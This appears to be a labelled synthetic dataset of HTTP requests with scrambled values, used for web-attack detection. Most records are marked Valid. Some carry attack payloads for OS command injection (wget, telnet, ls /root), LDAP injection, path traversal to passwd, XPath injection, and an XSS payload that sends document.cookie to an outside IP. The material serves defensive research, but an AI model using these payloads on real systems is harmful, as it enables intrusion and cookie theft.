Via: FTP/1.5 www.qaer.htm, 3.7 www.t7un.shtml
Transfer-Encoding: identity
Upgrade: emee/1.2, s5henp/5.5
Warning: 804 www.sash1o.gif "YAyleiuz1hb7te" 
X-Forwarded-For: 70.253.19.118
X-Serial-Number: 61054598804485092045
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40540
Start - Id: 1945
class: Valid
GET /k4linkJYzLhv/bE/eohtcetpise8vlh/onnlgaw9ousttaa/rylpu/aFA/nMKFuIP_ZLQ.Tb6q.js?Sc@nhRx=lqoneA&mapejaIs=na2htiauaa&mahi=neinputecho&mrNsd7muAta=5leai&tvySvvr=ttsottsfourcvm&hlr1eeaAo=819&nLaqrosemr=c HTTP/1.0
Host: 79.56.53.121
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: 8s14s-gbkkIeuy;q=0.7, o6th-nesbO;q=0.2
Cache-Control: min-fresh=10
Client-ip: 152.106.51.28
Cookie: db=)SilnnG
Cookie2: $Version="71"
Date: Sun, 28 Jan 07 11:54:53 UTC
ETag: W/"SLmMXLc63s.SN-b7H1Rf"
Expect: r6od=urssnn7;cduho=rrd5a9es
From: pvxch@7harUebet.com
If-Modified-Since: Fri, 17 Sep 04 18:30:02 CET
If-Unmodified-Since: Sun, 01 Jul 07 15:36:48 CET
If-Match: *
If-None-Match: "0wu8yiPfoBp.LqLc"
If-Range: "_JgT5_IXXW3ePicg"
Max-Forwards: 398
MIME-Version: 7.4
Pragma: pHgasel=fr3
Proxy-Authorization: Basic ZHRodGVtNDpyc1VldFM=
Authorization: 8erMn usNE=cpeNs1
Range: 0-,-750641
Referer: /vtxd/etai/u1eyuVs/b5usAa.asmx
TE: trailers
Trailer: Date
User-Agent: Mozilla/0.9 (Windows; U; Windows NT 6.5; oe-io; rv:7.7.5) Gecko/22156633
UA-CPU: Sparc
UA-Disp: 0367,7065,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 1543x007
Via: 9.1 www.orwt2et.tiff, 7.1 177.113.221.126
Transfer-Encoding: biets
Upgrade: tsd/0.2, alvm/0.6, iEenc/5.7, nnoc/8.2, rtetzy/1.1
Warning: 663 www.Libe.html "iztelp" "Wed, 09 May 07 24:02:00 UTC"
X-Forwarded-For: 218.173.209.61
X-Serial-Number: 539815603365
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 1945
Start - Id: 43520
class: OsCommanding
GET /pLmht4f5Aprkarvekr3r/0acsrlqlne0hdRAqntn/cudlJempdalto/baztccerkxeaa3/CRhR_eval/ne1TenisqoUet6eat/jfveeinEhucesWugcai9/ukioe/c3q/xKMYkrfO72tk/n_ezj3m/tGpGHohB0MP1_IH70ge.jsp?.FylZ=h2b+e+Aej&b5lT2bdl0haiaT=%5Cnls++%2Froot%2F&earsketts=fhntwgetErscript&1i4ha=oxtlpsgttstrEs&EEImfd=i%29srhthroeboot.inie&raDsdaAtut5aly=i+ere9hygttelnet1drieeD+r&zehowr2aDt=oWE9bac4&9tq=8&cyat4wroe81eo=oa+ame%25iEetvbscriptEoptA HTTP/1.0
Host: www.9rhetse56s.org
Connection: aasiteyu
Accept: */*;q=0.0
Accept-Charset: x-mac-arabic, euc-jp, windows-1251
Accept-Encoding: *
Accept-Language: ubsqa-aA;q=0.7, c06u1ps-m6
Cache-Control: no-transform
Client-ip: 108.184.195.217
Cookie: etrfqeYj=078001;ie8t=2$(A;BBNgM=7715434;d5cDmiTrySajyi=1;YxevalGael=9
Cookie2: $Version="4"
Date: Mon, 01 Dec 08 11:09:15 GMT
ETag: "ktdX-vkOq-6vCtnMc"
Expect: 100-continue
From: ioojil@heyq.net
If-Modified-Since: Mon, 02 Aug 04 15:26:52 CET
If-Unmodified-Since: Mon, 15 Aug 05 11:40:39 GMT
If-Match: *
If-None-Match: "H4rSj8SPBuZY_weZA9"
If-Range: Tue, 17 Apr 07 16:41:33 CET
Max-Forwards: 95
MIME-Version: 5.5
Pragma: mrt=ct2to
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM bWhoaHdtUmNzc3B0b255c2Vvb2VlY2U0aGFyMWZ0bWFoZWdib2lh
Range: 41-,-475,4948-
Referer: http://3ltie7O.ch/i3sA/unma4uqO.wmn
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.4 (Machintosh; U; PPC Mac OS X 1.1; ab-bi; rv:4.1.6) Gecko/18483897
UA-CPU: PowerPC
UA-Disp: 308,529,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 473x8335
Via: FTP/6.8 www.Ihuamoh.tiff, 2.2 2.224.77.226:7866, HTTP/7.7 252.148.237.206:31710
Transfer-Encoding: rbhcon
Upgrade: suSmk/4.7, nans/0.0
Warning: 156 193.81.211.74 "9aeu3wesnnaer" 
X-Forwarded-For: 119.116.114.21
X-Serial-Number: 61216613
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43520
Start - Id: 37666
class: LdapInjection
POST /mn/cRk-1uuLhOp/L4x3tk/neooenkdfhrblekith.png? HTTP/1.1
Content-Length: 145
Content-Language: A
Content-Encoding: deflate
Content-Location: http://www.nostdt.net/agsi/imbn/yhhtl/earnetaD.asmx
Content-MD5: bXNhcTRvdXVqZHJvb2hyZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 22 Jul 09 19:39:25 CET
Last-Modified: Tue, 15 Feb 05 14:24:37 GMT
Host: www.eEn9nwz.fr
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 205.236.132.204
Cookie: oeiiodmql=jlbKZfPXZNM;RnwwffounngddOh=ieotytslls&tmlike4q ;a3NcA3h=ebOLn
Cookie2: $Version="729"
Date: Wed, 12 Apr 06 22:09:33 GMT
ETag: "L1wKH0qc0h5OgNanY"
Expect: raso5lm
From: TttDoe@rczep.it
If-Modified-Since: Fri, 12 Sep 08 16:38:18 GMT
If-Unmodified-Since: Tue, 06 Apr 04 07:27:56 GMT
If-Match: "5qVSlFtCPr@W6bgJit"
If-None-Match: *
If-Range: Sun, 24 Jan 10 07:58:54 CET
Max-Forwards: 7858
MIME-Version: 9.4
Pragma: sClnnre=9
Proxy-Authorization: Digest uri=/heen1roq/eredadu/eloyue/dceeE.cgi
Authorization: Basic Y3VzZmhFYTpTaGhF
Range: 7-75,773-,28-851
Referer: http://www.eeohotTt.be/8tfoa/spOnrAn/tnib/nm7pu/rc2ah.exe
TE: deflate,trailers
Trailer: Authorization
User-Agent: Mozilla/2.3 (Machintosh; U; PPC Mac OS X 3.2; to-in; rv:0.8.1) Gecko/78793943
UA-CPU: StrongARM
UA-Disp: 770,856,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 940x1719
Via: 2.1 2.34.100.72, HTTP/1.0 206.92.198.88, HTTP/0.9 22.236.122.79
Transfer-Encoding: identity
Upgrade: pemoEi/4.0
Warning: 026 155.240.111.33 "facqeennibgrcecdveu" "Wed, 19 Jul 06 04:22:04 GMT"
X-Forwarded-For: 193.224.2.50
X-Serial-Number: 0737126851
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ecih=4Bnn eeadmina&Goe=)  ( | (odena=iTenn*)&7EhAesvosnEjnil=shutdown$sdo th0crnca\&NSFX=29199&phmail8j3=ecXJ9reTJhg&ap8itbs=6285

End - Id: 37666
Start - Id: 21148
class: Valid
GET /r.feXnR.m7D1MDi45yc/cwEytsaoe1.bin?a2auJIwhc4tltDm=ldohae&e9trmemeaSohyia=ey%3Anexec&glitTer=0stimntHsohcvo&xme=usv&kc=tEoei&CelwOmrmnlei1a=t3e0p&itmyhsti=53798&r0hnuoi=2&segitnu=ss%5Dpyjioc5ia&e6vtitkmrasu=4723 HTTP/1.0
Host: www.iEu699m.cz
Connection: ynaaS6rO
Accept: image/jpeg;q=0.2
Accept-Charset: utf-7;q=0.0, koi8-r, x-mac-chinesetrad, big5;q=0.7
Accept-Encoding: gzip;q=0.0, gzip;q=0.8, deflate;q=0.1, compress
Accept-Language: nasuju-ur;q=0.8
Cache-Control: max-age=20850
Client-ip: 148.220.182.133
Cookie: a9mkmmNJbt=heumi;bl=kJrTbHDVQ
Cookie2: $Version="985"
Date: Mon, 11 Dec 06 05:26:17 UTC
ETag: W/"uL2g6QkPb09Ijy3yR"
Expect: 24t25O
From: dhehtais@ahehpggov.uk
If-Modified-Since: Tue, 31 Mar 09 03:31:20 UTC
If-Unmodified-Since: Tue, 18 Nov 08 20:07:07 UTC
If-Match: *
If-None-Match: "oSJkeUAak@wbpx9o2E"
If-Range: "_ytj_sZouzZPbdV5"
Max-Forwards: 4717
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: spnetr snSiU=Eaaulsc
Authorization: NTLM c3RtYWF5YW8zNWJoaHRzaWViRXN2YXd0YWxvd29vaHhMZnNyRXRhNDlzMllyZXQ=
Range: 1175-,-288
Referer: http://g3aTmlr.biz/e1iup/Wgc5t.mpeg
TE: trailers,deflate
Trailer: Connection
User-Agent: Mozilla/4.6 (Machintosh; U; PPC Mac OS X 0.5; e7-Ah; rv:3.7.3) Gecko/17256762
UA-CPU: StrongARM
UA-Disp: 3826,0274,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 739x758
Via: 8.3 www.aeesdL.js
Transfer-Encoding: deflate
Upgrade: rouei/3.6, cHfr0/6.3
Warning: 554 www.g0den7.shtml "imsucel" "Thu, 03 May 07 11:10:04 CET"
X-Forwarded-For: 204.128.223.43
X-Serial-Number: 54078
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21148
Start - Id: 17433
class: Valid
GET /rja/iJlHjvH3O98RZULJvs/pT2xaTeb6z4da/NlkaekuoltiEto7sad/dy-VMo/etd9tihI1isE4/ojnud/tU3K7bJqlskoWOY/mudsvwnene3hre/tWXbX/2CT/lP9_C6fwc.shtml?e80ccwtIe=t-TWep3RS-z&aney0ycm=34CQwyXSbP&kotlntnr0=ee+hi&k5as=%5Bn&yyoegJhrtrye1S=%7E+i HTTP/1.1
Host: www.trraHQex.cz
Connection: close
Accept: */*;q=0.7
Accept-Charset: x-mac-korean;q=0.0, x-mac-korean, windows-1251;q=0.7, iso-8859-8, isiri-3342
Accept-Encoding: gzip;q=0.7
Accept-Language: xDo-era;q=0.1, e-senan1lk, euE3be-NosoiiIf;q=0.3, sdme-usie
Cache-Control: max-age=41
Client-ip: 0.107.219.106
Cookie: agumpetsele=9053;@mIaDOUMNV=hoeopt;asbkl=ezs3bdre
Cookie2: $Version="13"
Date: Sun, 01 Aug 04 03:55:22 CET
ETag: W/"s4g2OW4vcf4ajP3BWZj"
Expect: eeOjeim=shOr;el0lberd=Lrnleij
From: asobeo@yaOtdneg.de
If-Modified-Since: Mon, 24 Sep 07 10:10:06 UTC
If-Unmodified-Since: Sat, 13 Dec 08 23:44:10 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 17 May 06 12:58:05 UTC
Max-Forwards: 2804
MIME-Version: 8.5
Pragma: b='d'
Proxy-Authorization: Basic ZGVDb09pMDplbmRnY3Q=
Authorization: Basic aXNydEdFb3I6dGRpc2VvbnM=
Range: 8-
Referer: http://www.wor7ilep.st/tdflg/Lise/sed6Qex.txt
TE: trailers,chunked;q=0.6,trailers
Trailer: Host
User-Agent: Mozilla/7.8 (X11; U; Linux i586 9.3; pb-g6; rv:3.1.7) Gecko/43539559
UA-CPU: MIPS
UA-Disp: 113,258,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 769x9384
Via: 2.3 0.88.194.211, 1.4 117.241.33.195, lha/1.8 163.129.155.101
Transfer-Encoding: deflate
Upgrade: tnn/6.0, dhp2e/7.9, 7eo/4.5, 6ei8oh/4.0
Warning: 682 www.8mri.png "1onheHntbcn" "Fri, 11 Dec 09 19:10:46 CET"
X-Forwarded-For: 29.239.233.138
X-Serial-Number: 52284057
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17433
Start - Id: 36295
class: PathTransversal
GET /sl6ihz2srnnmsOcoqa/en3ghlsaanenjtadTL6x/i1ZtYh2/tHontrtme6sns/mJU/c60DpsW9.css?6drepT8hb=uAec4ginsertt&mGY6scatsEJ-rmi=%2F%2C%2C%2C%2FaenaeOp%2FCtieF%2Fpasswd&sO=ca%2BlN%24skcodasfzuC&yn8O5Er=hfi+e+teyr2c1a7eoSt HTTP/1.1
Host: www.ThNnAt.be:2
Connection: close
Accept: */*;q=0.2
Accept-Charset: iso-8859-7;q=0.0, macintosh, x-mac-chinesesimp;q=0.8
Accept-Encoding: *;q=0.1
Accept-Language: lndtn7lt-uE, k3nil-Olfter8s;q=0.4, e-hidO;q=0.1
Cache-Control: max-age=96501
Client-ip: 114.100.144.6
Cookie: ecabnt=689900144;seXNl0e=02413;hn=4binpdsIrEslrnS;0Pstlb=wBxT_t8l@;dtorFntro6=944
Cookie2: $Version="483"
Date: Thu, 20 Sep 07 02:53:01 GMT
ETag: W/"_CMpMj-5Yq9_H_Af87"
Expect: 100-continue
From: Ai3uSa@urpega.be
If-Modified-Since: Sat, 09 Aug 08 03:06:47 GMT
If-Unmodified-Since: Mon, 05 Jul 04 19:09:17 UTC
If-Match: "kqQF5Mu_oj6sOLww24x4"
If-None-Match: *
If-Range: *
Max-Forwards: 8951
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Basic Ym1uYTpkaWVmc2Nv
Authorization: Digest nc=baEfBefD
Range: 48895-751657,65-
Referer: http://j5iscoi.st/tyot4gm/Rri2w7/lgssogt/iect.jsp
TE: trailers
Trailer: Host
User-Agent: ilisnrn/8.9.7.1
UA-CPU: MIPS
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 645x5981
Via: 67inb/7.7 www.etnttw.js, 8.4 www.6alw.jpg, HTTP/6.8 50.224.35.30:1553
Transfer-Encoding: gzip
Upgrade: ye1nNS/5.5
Warning: 777 www.eraf47ht.html "lzrhseSsp9edvonjaeyx" "Fri, 05 Jun 09 03:03:54 UTC"
X-Forwarded-For: 142.213.134.120
X-Serial-Number: 50534394193049437616
----: -----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 36295
Start - Id: 28751
class: Valid
GET /oegixdd.msf?lmese=7614&tedp=54687&noaRohfaejMeuz=siniiibtpboibv6ihn&erim=mKJ7olqk&asx91Ainvnhamr=insertetbin%28%5Byiartt&phpicG=ihc+drn%5De5N4&m8i7=23977&Errit=73679848&eiieesftnny=eKL_2XHICdFP&enoEefpRewheey9=97715582&ntnhl=89&oimr6=8&fenmoaf=44452746&rvtme9eWnesaate=73 HTTP/1.0
Host: www.jtafghTs.gov:80
Connection: lem7rw
Accept: */*;q=0.9
Accept-Charset: x-mac-turkish, windows-1254
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 189.108.26.95
Cookie: cJi8=344;eeunrgNEpet7=aaii;moa=Srteibrt2ani8njaat;nnenpl1alttJzhd=054387;rn=hxyuaxtdO
Cookie2: $Version="18"
Date: Tue, 28 Feb 06 07:37:44 UTC
ETag: "h2paAtbFKtn92Iexy9h"
Expect: oraddz8m=putlz
From: s9len@yaTi.net
If-Modified-Since: Sun, 29 Oct 06 18:58:41 UTC
If-Unmodified-Since: Mon, 03 May 04 04:50:28 CET
If-Match: *
If-None-Match: "b@EwLuTkOYon5_2"
If-Range: "4wXXfUbs36O.-TOwU@z"
Max-Forwards: 87
MIME-Version: 8.9
Pragma: r='neled'
Proxy-Authorization: Digest nonce
Authorization: Digest response="fe0Dc09cE45Be6bFA91fEB1cFa5BeDc1"
Range: 304956-,017-,153089-880
Referer: /fqxasdr.png
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/0.4 (Machintosh; U; PPC 0.9; 9n-lc; rv:6.9.4) Gecko/15927702
UA-CPU: Sparc
UA-Disp: 062,8206,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 621x541
Via: HTTP/4.4 42.39.102.230:5272
Transfer-Encoding: deflate
Upgrade: neh1s/1.0, eotma/9.0, Ro80/3.1, rtdu4m/8.2
Warning: 673 www.aoddaoz.png "sjrpttsidso" "Sun, 08 Jun 08 22:54:26 GMT"
X-Forwarded-For: 52.173.254.213
X-Serial-Number: 77870
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28751
Start - Id: 15664
class: Valid
GET /tseobcPlacro8ordab4e/thzshe7xu/3b/biblNeoet8jsteIs/03iq-O/tOV7RQ/en2koFVXPeP1Wo.php4?NtbtdeeTtOywxa7=jnru%3Brv&mNZw37Ht=8&levalformS3php5@bgsound=qb%3Dpasswd&HpasswdcsVS4_KCCa=E HTTP/1.1
Host: www.rcrewMas.de
Connection: close
Accept: audio/*, text/xml, video/quicktime;q=0.0
Accept-Charset: euc-cn, euc-cn;q=0.6
Accept-Encoding: compress;q=0.9, identity;q=0.3
Accept-Language: fdmrca-ziloi;q=0.3, yFoes-IgIhE6, AeO8eAin-nlta, ellhhC-iebc, mct-e6Zcies3;q=0.6
Cache-Control: no-store
Client-ip: 197.42.196.77
Cookie: t4LweO=pRoI4J;heh6r=34207;R1TGEV0=sdZb
Cookie2: $Version="2"
Date: Thu, 17 Nov 05 20:40:13 GMT
ETag: "3ZhpE.ESE7NPEW1r6TbR"
Expect: vir4dq=i1xatt;extc
From: 6rsL@5sohfr.de
If-Modified-Since: Wed, 31 Mar 04 11:45:55 CET
If-Unmodified-Since: Thu, 05 Mar 09 11:10:46 UTC
If-Match: "34euGWVJaZftAsd"
If-None-Match: *
If-Range: "RE35uP-@gFmBNCRe-Kf"
Max-Forwards: 4505
MIME-Version: 3.2
Pragma: 5=espkee
Proxy-Authorization: teor nreet8r=iOewe
Authorization: NTLM cnJocHBmb25wYWluNGxpc2JwanNzbnBlYWFmdG5TT3RvaDNqZXM=
Range: -999103
Referer: /deto3s7.nsf
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.6 (compatible; Konqueror/0.5; Windows NT; L9re; matwa)
UA-CPU: PowerPC
UA-Disp: 9331,266,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2296x8201
Via: 0.6 www.ial74in.jpg, 9.9 www.eetlels.htm
Transfer-Encoding: deem
Upgrade: nIttOn/7.6, s3nl/3.5, 90l/3.3, yneaI/5.5
Warning: 523 www.ng7luas.tiff:4 "disElcEdux" 
X-Forwarded-For: 138.24.33.93
X-Serial-Number: 35129354976
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 15664
Start - Id: 49288
class: XPathInjection
GET /yjsyP6xhmiWv8b/mnjsnlnherssta.msf?etctggeelsNeu=%24n&XoptaAKzmail5=94936581&osh=ts&rtnnwnh2a=%7Ctbodyposition%25%3FaeaqTwget5s&5delete8XeqdJ9S=0++++or++1%3C+++++z%2Fv0d%2Fruo%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D826%5D+++or+593%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&d1btao=rAv08k0IPzC&ble=17195092&jtb84Dqmrenrnyi=16808835&oag=7636246&an=177368&Ndt7HlIkNe0=3&15PCI=%7Cce3cp%27jeaoulc&8lqhe=agerdejrerd&oteoStsiqqnh3=pm%3An0dt%28 HTTP/1.1
Host: www.dsrry.be
Connection: aeyzgt
Accept: */*;q=0.0
Accept-Charset: windows-1254, isiri-3342;q=0.1, iso-2022-jp;q=0.1
Accept-Encoding: deflate, deflate;q=0.7
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 226.125.42.173
Cookie: acceptGdX=50500666;els3aDndeTfnfad=3
Cookie2: $Version="213"
Date: Thu, 25 Jan 07 08:13:18 UTC
ETag: "kip5j5ec5RFhUSVhtKck"
Expect: 100-continue
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Sun, 19 Jun 05 09:51:40 UTC
If-Unmodified-Since: Sun, 10 Feb 08 19:46:06 CET
If-Match: "6o-ou3PphaqUXnIc4-kv"
If-None-Match: "4KudhqUQ5Aq5tvloe"
If-Range: Thu, 17 Jun 04 18:51:47 CET
Max-Forwards: 16
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: NTLM YmVlaHJpZVNvNXlmamZwYW4xYWRydDdod3Noc3NsT3RrM280aWw=
Authorization: Digest username="eo0oTwp"
Range: 305761-528973
Referer: http://dttqfh.fr/itrw4h1/4etw.png
TE: gzip;q=0.8
Trailer: Trailer
User-Agent: Mozilla/8.4 (Windows; U; WinNT 1.0; 3p-ao; rv:3.8.6) Gecko/17950243
UA-CPU: Sparc
UA-Disp: 284,977,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 7888x6205
Via: Ecne/2.1 177.112.49.91:5, sA1/5.1 140.70.60.237:7405, 1.8 61.255.198.206
Transfer-Encoding: tnnc
Upgrade: eso/2.4, aboa/1.7
Warning: 952 www.opnaAke.tiff "wdiercrcmppwienapny" 
X-Forwarded-For: 18.172.169.90
X-Serial-Number: 15070707581939695
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49288
Start - Id: 18006
class: Valid
GET /geaen/oxPCEgW1T1/.QX0a38W.lc/NqfcWC2/rwGS0/LB@v/3ibncoir8c/67Zt/kIO86EU/hh93UTGiM/uSzeS4St76y21r3/93nLw9gF3bNtKXJ-tj3P.png?Flefayntoi=1sehandOa&udvuq=Dsnen&heks=lnAQDa&rrMsamGnef1g=0&8lI@=4719&DSF8RWX5YvM3=ji&42a=p_Dh&il=lQ1Vn54%40rZ&shn4=n1eene0eewwd4rts&Iy_VhtaccestnuKx0=232591 HTTP/1.0
Host: www.uh78u.st
Connection: keep-alive
Accept: video/quicktime
Accept-Charset: *;q=0.7
Accept-Encoding: deflate, deflate, identity, deflate
Accept-Language: *
Cache-Control: no-cache
Client-ip: 224.118.55.101
Cookie: ndo0ocsininvatr=1tnatntmjnq7a;7sgnye=Ts'os
Cookie2: $Version="288"
Date: Fri, 10 Apr 09 24:10:45 UTC
ETag: "KKiktc_31xb1pEF-S"
Expect: 100-continue
From: 1fhht@jeisbtlV.biz
If-Modified-Since: Sat, 31 Dec 05 07:24:52 CET
If-Unmodified-Since: Fri, 11 Jun 04 18:52:21 UTC
If-Match: *
If-None-Match: "D8-o4a@VdqT6d25KEtOu"
If-Range: *
Max-Forwards: 8732
MIME-Version: 4.7
Pragma: y='tec6p2'
Proxy-Authorization: Digest uri=http://ksSrmna.ch/he8c/tvrHsfIh/uruss.mp3
Authorization: Basic cm9hZTpNb29uNUFs
Range: -97846,05989-6,385-85231
Referer: /oeda.bin
TE: deflate,trailers,trailers
Trailer: Range
User-Agent: tsuaene (t51Nf1; hr9En1yHx9)
UA-CPU: x86
UA-Disp: 8850,7638,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 642x5791
Via: 9.6 www.nePHmC.js, 5.0 228.34.160.233, 7.2 www.Rrrerx.jpg:8
Transfer-Encoding: gzip
Upgrade: ii7hn/3.4, rwte/5.6
Warning: 949 59.202.70.214 "dniryhss1asaesunNun" "Wed, 17 Jun 09 23:54:21 GMT"
X-Forwarded-For: 104.233.139.60
X-Serial-Number: 094321
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18006
Start - Id: 47483
class: XSS
GET /leeEha7eedNc/nB_iyX.@KkqDd@hjzCx/ntphiho/v1htrllpet/pS1hTSD/teFa/n0nI8.BO6ohVxZn_7p/oalfai4Z.asmx?log0w_X=t%2B5replaceb%26i%7C%26ae6&MTycV=%3Cimg++src%3D%26%7B%5Bwindow.open%28%27http%3A%2F%2F109.166.81.35%2Fgeatti.exe%27%2Bdocument.cookie%29%3B%5D%7D%3B%3E HTTP/1.1
Host: www.o24pfIgpz1.be
Connection: keep-alive
Accept: text/plain;q=0.7, image/*;q=0.8
Accept-Charset: x-mac-korean, x-mac-turkish, isiri-3342;q=0.3
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.7
Cache-Control: cex=t
Client-ip: 66.213.204.241
Cookie: ila6et=938741532
Cookie2: $Version="25"
Date: Thu, 18 Jun 09 01:11:38 UTC
ETag: W/"Q.aFiei1JBvNXi@"
Expect: 100-continue
From: ghun@e9ggr0ugra.com
If-Modified-Since: Tue, 06 Jun 06 02:04:37 CET
If-Unmodified-Since: Wed, 12 Aug 09 09:59:31 UTC
If-Match: "6ws-g8rj4ia9UoU762a"
If-None-Match: "Jo5FcRmvfghqVjAzYkIH"
If-Range: Mon, 18 Aug 08 20:08:52 CET
Max-Forwards: 461
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: 6s4e rdvto=nzte
Authorization: jeobj itene=iembtoa
Range: 9183-933,-0
Referer: /PEs4bt/nT3yabd/br85pO/d7oyoro/mveEufp.cfm
TE: trailers,trailers,chunked;q=0.2
Trailer: Authorization
User-Agent: hos8 (ijEIi1Cb; ivWc.1xi; nbtY3pn6; sMy-jiZ7)
UA-CPU: MIPS
UA-Disp: 2372,1267,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 747x653
Via: gIrrrH/6.6 www.rcjtdn.jpeg, tra/8.9 www.ahsnPpb7.htm, 6.1 www.nsoaofvo.tiff
Transfer-Encoding: deflate
Upgrade: ehTh/2.2, etnsh/9.8, hi5/2.0
Warning: 858 www.Bomdfr.html:92 "eaLxhrCi8Tuapar" 
X-Forwarded-For: 162.199.201.1
X-Serial-Number: 48112496441051
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47483
Start - Id: 18744
class: Valid
GET /rSTlen5n.j.js?aatmGXCZie=ebchild%27&nOtIaev4aehnh=eo&yacei9e=6fre&As0ayecltT8sl99=9034&tEtun7el9Rlrm=aetDerf HTTP/1.1
Host: 58.100.83.34
Connection: close
Accept: */*
Accept-Charset: euc-kr;q=0.7, x-mac-korean;q=0.7, x-mac-hebrew, x-mac-greek, isiri-3342
Accept-Encoding: gzip, identity, gzip;q=0.2, gzip
Accept-Language: *;q=0.3
Cache-Control: l=tt12t
Client-ip: 98.253.236.200
Cookie: uiubeoosTtissxs=9r(;kiiilcl7=aprocessing-instruction;tzjaoitetE=229001147
Cookie2: $Version="357"
Date: Tue, 08 Jan 08 20:34:58 GMT
ETag: "CXvAWFbVtSA2Kq_"
Expect: 100-continue
From: envreer4@lEts7.gov
If-Modified-Since: Sun, 24 Jul 05 18:17:54 UTC
If-Unmodified-Since: Thu, 01 Mar 07 22:54:14 GMT
If-Match: "of3f37sqdMHfN8q"
If-None-Match: "XMNCm3R3SrBMCEowEBFy"
If-Range: Mon, 09 Oct 06 02:44:04 UTC
Max-Forwards: 948
MIME-Version: 0.0
Pragma: a6can=e1sa1omy
Proxy-Authorization: NTLM aWFvYnRCZW5lN3pzb2Fwa2l0Z3FleUlhN2k3dW1ybnR0YWVjZHJTaA==
Authorization: Basic ZXNlbDQzZlQ6d05PMmlzdGk=
Range: 43867-
Referer: /Chttidsc/e8tt/sU0u/ahnt/eVbvoi.tiff
TE: gzip;q=0.7
Trailer: Accept
User-Agent: ewcqtym (cdEpI1xa0; 1Jutah6LTI; o0eMkGOskC; ak0L.yC)
UA-CPU: 68000
UA-Disp: 752,4892,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 854x2880
Via: HTTP/5.8 www.ksEhs.css
Transfer-Encoding: identity
Upgrade: iwlt/7.1, 2hr1s/4.8, inkArL/0.1, fttws/7.1
Warning: 921 www.wRltoroI.gif "hibn" 
X-Forwarded-For: 11.94.114.1
X-Serial-Number: 57174297786
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18744
Start - Id: 11417
class: Valid
GET /nrvetoeib6rUa/eu6noiiaf0naef/fy0/yt/en5RA_C8T2jq2epnT/rbnph-uLQdrop/q6Z/omat6aO/aNz25ltbx/hoag0onrl/a@ekfbu.W5z_QC1.cfm?eetsosahnstnndn=x+&oos3r=%27eireoehtelnet HTTP/1.1
Host: 243.1.140.248
Connection: close
Accept: */*;q=0.0
Accept-Charset: x-mac-roman;q=0.8, koi8, euc-jp, x-mac-turkish, koi8-r;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 148.233.33.178
Cookie: oelrovNHt3=nQ0Gaf;isEaezn=977415
Cookie2: $Version="67"
Date: Wed, 28 May 08 06:32:29 UTC
ETag: "NwsS@HKezAdukAiic"
Expect: IbrfEedi=twxa0
From: Os6stee@odgijfte0u.ch
If-Modified-Since: Mon, 25 Oct 04 13:11:47 UTC
If-Unmodified-Since: Fri, 06 Feb 04 17:50:01 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 17 Sep 08 21:13:21 GMT
Max-Forwards: 9
MIME-Version: 4.6
Pragma: n=4ius
Proxy-Authorization: Basic bXNpcmZqdzpvbGZCam5l
Authorization: Digest algorithm=Hhilmp
Range: -56,26-
Referer: http://nerc.st/beetdA/rtsd.jpg
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/6.6 (Windows; U; Windows NT 2.7; ui-r4; rv:7.3.5) Gecko/12299381
UA-CPU: Sparc
UA-Disp: 9055,045,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 078x9567
